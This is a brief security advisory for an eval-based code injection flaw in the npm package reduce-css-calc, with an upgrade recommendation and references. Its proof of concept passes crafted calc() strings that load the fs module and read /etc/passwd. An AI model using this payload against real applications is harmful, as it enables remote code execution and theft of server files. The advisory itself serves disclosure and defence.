Arbitrary Code Injection

Overview

Affected versions of reduce-css-calc pass input directly to eval. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.

Proof of Concept

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));

Recommendation

Update to version 1.2.5 or later.

References

• https://gist.github.com/ChALkeR/415a41b561ebea9b341efbb40b802fc9
• GitHub Advisory